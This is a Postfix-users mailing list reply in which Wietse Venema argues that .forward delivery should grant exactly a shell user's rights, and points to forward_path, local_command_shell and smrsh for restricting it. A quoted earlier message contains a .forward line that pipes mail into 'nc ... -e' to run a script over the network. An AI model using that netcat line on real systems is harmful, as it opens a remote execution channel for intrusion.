Tomasz Pala via Postfix-users: > On 2024-12-20 19:02, Wietse Venema via Postfix-users wrote: > > > >> You say "local is non-chrootable" - I say local is the mostly exposed, > >> running user-provided content, binary and environment. It's the local > >> which can exploit CVE in your kernel. You're not preventing any of this. > > > > I think that statements like this are disqualifying their speaker from > > this discussion. > > target $ cat .forward > "| nc 10.1.16.9 1919 -e ~target/.forward_shell2.py"
Postfix separates mechanism from policy. Mechanism: Postfix .forward impersonation aims to provide the same rights as a user that has interactive shell access. If Postfix provides more rights than interactive shell access, that is a security hole in Postfix. If Postfix provides less, then Postfix is just broken. Policy: If a user has no interactive shell access, then their .froward privileges can be taken away with forward_path, and they can be reduced with local_command_shell. https://www.postfix.org/postconf.5.html#forward_path with https://www.postfix.org/postconf.5.html#local_command_shell https://linux.die.net/man/8/smrsh What are your contributions to the open-sorce ecosystem? Wietse _______________________________________________ Postfix-users mailing list -- postfix-users@postfix.org To unsubscribe send an email to postfix-users-le...@postfix.org
